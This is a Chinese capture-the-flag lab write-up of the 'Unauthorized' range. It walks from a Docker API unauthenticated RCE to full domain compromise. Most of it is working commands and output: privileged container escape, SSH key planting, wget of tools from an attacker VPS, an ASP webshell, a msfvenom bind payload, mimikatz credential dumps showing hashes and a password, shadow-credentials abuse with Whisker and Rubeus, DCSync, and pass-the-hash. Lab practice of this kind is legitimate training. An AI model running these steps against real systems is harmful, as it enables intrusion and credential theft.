春秋云镜-Unauthorized-Writeup_poc-yaml-go-pprof-leak

靶标介绍：

Unauthorized是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag，分布于不同的靶机。

刚开始 给了我们个目标IP
4x.xx.xx.xx
我们直接使用fscan来进行扫描

fscan -h 4x.xx.xxx.xxx
1

得到一个docker-api 未授权 rce 的显示

访问web页面

http://4x.xx.xxx.xxx:2375/version
1

得到一些信息 这就说明了docker 未授权rce是能够利用的
然后我们找一台有docker命令的机器

sudo docker  -H tcp://4x.xx.xxx.xxx:2375 ps
1

然后我们以特权模式启动容器
这样是为了能够挂载目标机器的磁盘

sudo  docker -H tcp://4x.xx.xxx.xxx:2375/ run -it --privileged alpine  /bin/sh
1

查看本地磁盘

 fdisk -l
1

建个目录并且挂载

 mkdir test
 mount /dev/vda1 test
 cd test
1
2
3

然后我们就能操作本地的磁盘了
刚fscan扫到他的ssh端口是开的
所以我这里不采用反弹shell
直接通过写authorized_keys 认证密钥来进行登录
ssh-keygen -t rsa生成
把这一段拿出来

echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDxhz0QVkYVTnkpbUZIU93QjJsRrWNR3u2TeRAhcMHK62qijD81sgq8LKcGbKYqHFD0eX7uCsr1f7pPilQRC+WVSsRG/icU4nYqSyQudu3KjzReqFfnT1XDswSObq3jzFyqDA0jhyNADRvvWOr8bDPlHbeLoFAMKqRzA9eiQjfhQ8MWdOLZIFxaSbu8G93h5XkablZapeL02f89icm4gK8KLC1rVWwJdCJqDXtBm91xKfAkGwKTni//g5tmhtvYFZ6LPiWG8a4vS885ZmrXwvtFZ+MIJUUDqQlaJPs2coEpmV+11ivRlEhy5LG48JCLl3QbGunTC1kDLUBj8rY+3YmIQ9A9Ymv33Wse4CjFBS3jcLl7b6QzT/OIzU8Nu0/fwpBbHE+ZSl45E9CaHEsbAGcdNJLY372ozEaoK8nV67cn3+UML7iM2T+TkvAoduwzk/+7Bmv2KW4fMJYN1Ejfit+g6+X6m5yA5SVSuZQUpzWCp54wBJR62ImpUFZM9vJ1mFE= kali@DESK >>/test/root/.ssh/authorized_keys
1

我们这样子就行了

直接ssh登录就能成功到机器上面
然后查看flag

flag不在文件，但是在数据库里

很明显是第二个
打到这里之后就是内网横向了
上传fscan
在公网整台vps 运行 然后靶机远程wget下载

python3 -m http.server 8080
1

wget 1xx.xx.xx.xx:8080/fscan
1

在下载frpc 搭建隧道

wget 1xx.xx.xx.xx:8080/frpc
1

wget 1xx.xx.xx.xx:8080/frpc.ini
1

• frpc.ini

[common]
server_addr = 1xx.xx.xx.xx
server_port = 7001


[socks_proxy]
type = tcp
remote_port =8886
plugin = socks5
1
2
3
4
5
6
7
8
9

然后就是给权限并且运行

root@localhost:/tmp# chmod +x *
root@localhost:/tmp# ./fscan -h 172.22.7.13/24
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 172.22.7.13     is alive
(icmp) Target 172.22.7.6      is alive
(icmp) Target 172.22.7.31     is alive
(icmp) Target 172.22.7.67     is alive
[*] Icmp alive hosts len is: 4
172.22.7.67:445 open
172.22.7.13:2375 open
172.22.7.6:88 open
172.22.7.31:445 open
172.22.7.6:445 open
172.22.7.67:8081 open
172.22.7.67:139 open
172.22.7.31:139 open
172.22.7.6:139 open
172.22.7.67:135 open
172.22.7.31:135 open
172.22.7.6:135 open
172.22.7.13:80 open
172.22.7.67:80 open
172.22.7.67:21 open
172.22.7.13:22 open
[*] alive ports len is: 16
start vulscan
[*] 172.22.7.67          XIAORANG\WIN-9BMCSG0S
[*] 172.22.7.31          XIAORANG\ADCS
[*] 172.22.7.6     [+]DC XIAORANG\DC02
[+] NetInfo:
[*]172.22.7.67
   [->]WIN-9BMCSG0S
   [->]172.22.7.67
[+] NetInfo:
[*]172.22.7.31
   [->]ADCS
   [->]172.22.7.31
[+] NetInfo:
[*]172.22.7.6
   [->]DC02
   [->]172.22.7.6
[*] WebTitle:http://172.22.7.13        code:200 len:27170  title:某某装饰
[*] WebTitle:http://172.22.7.13:2375   code:404 len:29     title:None
[+] ftp://172.22.7.67:21:anonymous
   [->]1-1P3201024310-L.zip
   [->]1-1P320102603C1.zip
   [->]1-1P320102609447.zip
   [->]1-1P320102615Q3.zip
   [->]1-1P320102621J7.zip
   [->]1-1P320102J30-L.zip
[*] WebTitle:http://172.22.7.67        code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://172.22.7.67:8081   code:200 len:4621   title:公司管理后台
[+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
[+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak
已完成 16/16
[*] 扫描结束,耗时: 21.061062708sroot@localhost:/tmp#
root@localhost:/tmp# ./frpc -c ./frpc.ini  &
[1] 3616
root@localhost:/tmp# 2022/10/17 17:48:09 [I] [service.go:301] [f866e9720aae6cbe] login to server success, get run id [f866e9720aae6cbe], server udp port [0]
2022/10/17 17:48:09 [I] [proxy_manager.go:144] [f866e9720aae6cbe] proxy added: [socks_proxy]
2022/10/17 17:48:09 [I] [control.go:180] [f866e9720aae6cbe] [socks_proxy] start proxy success
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

然后就是分析内网资产
本地用proxifier连接好代理配置好规则
访问内网的web页面
可以看到 这里还存在一个www.zip的源码泄露
下载下来并进行分析

这里存在这和ftp 内容一样的文件
这说明他的ftp目录挂在在他的download下面了
那我们就直接往download 里面上传webshell
asp 一句话

<%eval request("pass")%>
1

root@localhost:/tmp# ftp 172.22.7.67
Connected to 172.22.7.67.
220 Microsoft FTP Service
Name (172.22.7.67:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-09-22  09:29PM                25356 1-1P3201024310-L.zip
07-09-22  09:29PM                42984 1-1P320102603C1.zip
07-09-22  09:29PM                39333 1-1P320102609447.zip
07-09-22  09:29PM                38231 1-1P320102615Q3.zip
07-09-22  09:29PM                43240 1-1P320102621J7.zip
07-09-22  09:28PM                25105 1-1P320102J30-L.zip
07-09-22  09:29PM                29023 1-1P3201210390-L.zip
07-09-22  09:29PM                41885 1-1P3201211110-L.zip
07-09-22  09:29PM                36787 1-1P3201211380-L.zip
07-09-22  09:29PM                31986 1-1P3201211570-L.zip
07-09-22  09:30PM                 9733 1-1P320163434135.zip
07-09-22  09:29PM                12172 1-1P320163J2J2.zip
07-09-22  09:29PM                 8705 1-1P320163P3963.zip
226 Transfer complete.
ftp> exit
221 Goodbye.
root@localhost:/tmp# echo '<%eval request("pass")%>' > a.asp
root@localhost:/tmp# ftp 172.22.7.67
Connected to 172.22.7.67.
220 Microsoft FTP Service
Name (172.22.7.67:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put a.asp
local: a.asp remote: a.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
26 bytes sent in 0.00 secs (1.3050 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-09-22  09:29PM                25356 1-1P3201024310-L.zip
07-09-22  09:29PM                42984 1-1P320102603C1.zip
07-09-22  09:29PM                39333 1-1P320102609447.zip
07-09-22  09:29PM                38231 1-1P320102615Q3.zip
07-09-22  09:29PM                43240 1-1P320102621J7.zip
07-09-22  09:28PM                25105 1-1P320102J30-L.zip
07-09-22  09:29PM                29023 1-1P3201210390-L.zip
07-09-22  09:29PM                41885 1-1P3201211110-L.zip
07-09-22  09:29PM                36787 1-1P3201211380-L.zip
07-09-22  09:29PM                31986 1-1P3201211570-L.zip
07-09-22  09:30PM                 9733 1-1P320163434135.zip
07-09-22  09:29PM                12172 1-1P320163J2J2.zip
07-09-22  09:29PM                 8705 1-1P320163P3963.zip
10-17-22  05:55PM                   26 a.asp
226 Transfer complete.
ftp>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

上传完成
然后用Godzilla 或者其他工具连接

紧接着就生成木马去正向连接上线
因为目标机器是不出网的 所以反弹没用

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4445 -f exe -o 1.exe
1

紧接着就运行
运行之后用msf去连接这个监听的4445端口

msf6> use exploit/multi/handler
msf6> set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set proxies socks5:1xx.xx.xx.xx:8886
msf6 exploit(multi/handler) > set RHoST 172.22.7.67
RHoST => 172.22.7.67
msf6 exploit(multi/handler) > set  LPORT  4445
LPORT => 4445
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 172.22.7.67:4445
NOTE: Rex::Socket.gethostbyname is deprecated, use getaddress, resolve_nbo, or similar instead. It will be removed in the next Major version
[*] Sending stage (200774 bytes) to 172.22.7.67
[*] Meterpreter session 3 opened (192.168.1.104:58373 -> 1xx.xx.xx.xx:8886) at 2022-10-17 18:01:44 +0800

meterpreter >
1
2
3
4
5
6
7
8
9
10
11
12
13
14

然后直接用getsystem就能提权

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
1
2
3
4
5

然后load kiwi 抓取hash

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain    NTLM                              SHA1                                      DPAPI
--------       ------    ----                              ----                                      -----
WIN-9BMCSG0S$  XIAORANG  a85436900fad5521ab67cf6bc5ecf13a  7798c121e94987889f967251afdeb029562ca579
zhangfeng      XIAORANG  97db334121c5d97762be2bf549a5eb34  e197e0a2d4cd8de4196e8758a70814ba11689767  46b7d9fb7ad9ff9b6ef089249690dd56

wdigest credentials
===================

Username       Domain    Password
--------       ------    --------
(null)         (null)    (null)
WIN-9BMCSG0S$  XIAORANG  (null)
zhangfeng      XIAORANG  (null)

kerberos credentials
====================

Username       Domain        Password
--------       ------        --------
(null)         (null)        (null)
WIN-9BMCSG0S$  xiaorang.lab  2e 71 03 fd 8f d8 12 79 30 be 2f 69 71 bd 21 a9 a9 28 21 0b 38 94 f9 cb a5 0e a0 63 f3 b6 f3 0c ad a9 a6 5d c3 c1 98 f9 d4 df
                              0a af 1b ec c6 e0 98 59 5d f8 5d ad 34 7d dc a3 f6 b3 e1 34 7c 94 e7 54 a7 0c 94 fa ba 37 c5 6c 9c 84 d3 53 89 a3 29 31 34 7
                             6 6d 4f e8 a4 05 a2 f1 6c bf 6c 26 dc ba ac a7 56 2c e1 c7 47 98 c5 2a 5c 77 10 98 1c f8 2d b7 35 8e b2 0f 3a 82 22 13 22 fa
                             c7 b9 e9 b4 0d fb 5d e1 c9 bd d5 37 e0 bb 85 5f 21 53 90 c1 58 cd 4e c2 13 c2 60 be 4c 59 1a 87 dc ea 0e 9a fb d8 8a 9f cd 50
                              7e a7 b7 01 cf e4 d8 86 0d 5a a9 7b 03 09 f0 f1 19 fa 87 2b c2 63 9b d2 58 64 b5 b0 96 54 d6 3d 57 a7 91 48 88 e5 51 2d c5 4
                             2 5f b7 db a0 3a 9f b7 99 10 59 e3 d6 91 fc 98 cf c4 d2 8b a0 c0 48 51 19 91 cb ec 33 76 3a d5
win-9bmcsg0s$  XIAORANG.LAB  (null)
zhangfeng      XIAORANG.LAB  FenzGTaVF6En
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

进去他的shell进一步的收集信息

meterpreter > shell
Process 4256 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.17763.2928]
(c) 2018 Microsoft Corporation����������Ȩ����

C:\inetpub\wwwroot\background\download>net user /domain
net user /domain
������������ xiaorang.lab ��������������


\\DC02.xiaorang.lab ���û��ʻ�

-------------------------------------------------------------------------------
Administrator            chenjian                 chenjun
chentao                  chenwei                  chenyong
Guest                    krbtgt                   lijun
liliang                  liting                   liuping
zhangfeng                zhangjian                zhangjie
zhangkai                 zhangli                  zhangpeng
zhangyong
����������ϣ�������һ����������


C:\inetpub\wwwroot\background\download>net user
net user

\\ ���û��ʻ�

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
����������ϣ�������һ����������


C:\inetpub\wwwroot\background\download>net time /domain
net time /domain
\\DC02.xiaorang.lab �ĵ�ǰʱ���� 2022/10/17 18:08:49

����ɹ���ɡ�


C:\inetpub\wwwroot\background\download>net user zhangfeng /domain
net user zhangfeng /domain
������������ xiaorang.lab ��������������

�û���                 zhangfeng
ȫ��
ע��
�û���ע��
����/��������          000 (ϵͳĬ��ֵ)
�ʻ�����               Yes
�ʻ�����               �Ӳ�

�ϴ���������           2022/7/9 16:31:53
���뵽��               �Ӳ�
����ɸ���             2022/7/10 16:31:53
��Ҫ����               Yes
�û����Ը�������       Yes

����Ĺ���վ           All
��¼�ű�
�û������ļ�
��Ŀ¼
�ϴε�¼               2022/10/10 4:05:24

������ĵ�¼Сʱ��     All

�������Ա
ȫ�����Ա             *Key Admins           *Domain Users
����ɹ���ɡ�


C:\inetpub\wwwroot\background\download>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74

这里我们能知道zhangfeng这个用户是在key Admins 管理组的
那我们就能通过这个来进行利用
在这之前需要我们把权限给迁移到xiaorang/zhangfeng 这个域账户上去
这里我用incognito这个模块去进行更改权限

meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
IIS APPPOOL\background
NT AUTHORITY\SYSTEM
XIAORANG\zhangfeng

Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR

meterpreter > impersonate_token "XIAORANG\zhangfeng"
[+] Delegation token available
[+] Successfully impersonated user XIAORANG\zhangfeng
meterpreter > shell
Process 2848 created.
Channel 2 created.
Microsoft Windows [�汾 10.0.17763.2928]
(c) 2018 Microsoft Corporation����������Ȩ����

C:\inetpub\wwwroot\background\download>whoami
whoami
xiaorang\zhangfeng
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

权限更改完成之后就可以针对他的这个key admins组去进行利用 更多详细
首先https://github.com/eladshamir/Whisker 去这个项目下载源码 并进行编译
然后上传到目标系统上去
进去他的shell

Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab
1

得到这个
然后还要上传 Rubeus.exe https://github.com/GhostPack/Rubeus 这个项目去下载
这里要加上一个/ptt 这个命令是把票据导入内存中 我看上面的回显是没有加的

Rubeus.exe asktgt /user:DC02$ /certificate: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 /password:"v1FkG1vTFGEO0abD" /domain:xiaorang.lab /dc:DC02.xiaorang.lab /getcredentials /show /ptt
1

到这里我们就能直接用mimikatz去dump域控管理员的hash了

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:xiaorang\Administrator" exit
1

成功得到域控管理员的hash
然后就可以用impacket工具包里的wmiexec去横向上域控了

$ impacket-wmiexec   xiaorang.lab/administrator:@172.22.7.6  -hashes :bf967c5a0f7256e2eaba589fbd29a382
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
DC02
C:\>type C:\users\administrator\flag\*

C:\users\administrator\flag\flag03.txt

 __    __                                  __      __                            __                            __
/  |  /  |                                /  |    /  |                          /  |                          /  |
$$ |  $$ | _______    ______   __    __  _$$ |_   $$ |____    ______    ______  $$/  ________   ______    ____$$ |
$$ |  $$ |/       \  /      \ /  |  /  |/ $$   |  $$      \  /      \  /      \ /  |/        | /      \  /    $$ |
$$ |  $$ |$$$$$$$  | $$$$$$  |$$ |  $$ |$$$$$$/   $$$$$$$  |/$$$$$$  |/$$$$$$  |$$ |$$$$$$$$/ /$$$$$$  |/$$$$$$$ |
$$ |  $$ |$$ |  $$ | /    $$ |$$ |  $$ |  $$ | __ $$ |  $$ |$$ |  $$ |$$ |  $$/ $$ |  /  $$/  $$    $$ |$$ |  $$ |
$$ \__$$ |$$ |  $$ |/$$$$$$$ |$$ \__$$ |  $$ |/  |$$ |  $$ |$$ \__$$ |$$ |      $$ | /$$$$/__ $$$$$$$$/ $$ \__$$ |
$$    $$/ $$ |  $$ |$$    $$ |$$    $$/   $$  $$/ $$ |  $$ |$$    $$/ $$ |      $$ |/$$      |$$       |$$    $$ |
 $$$$$$/  $$/   $$/  $$$$$$$/  $$$$$$/     $$$$/  $$/   $$/  $$$$$$/  $$/       $$/ $$$$$$$$/  $$$$$$$/  $$$$$$$/

flag04：flag{8xxxxe-4f3xxxx2-8xxxxx-8xxxxx5}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

域内另一台ADCS也可以用这种方法远程上去

$ impacket-wmiexec   xiaorang.lab/administrator:@172.22.7.31  -hashes :bf967c5a0f7256e2eaba589fbd29a382
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
ADCS
1
2
3
4
5
6
7
8

好了至此 打靶结束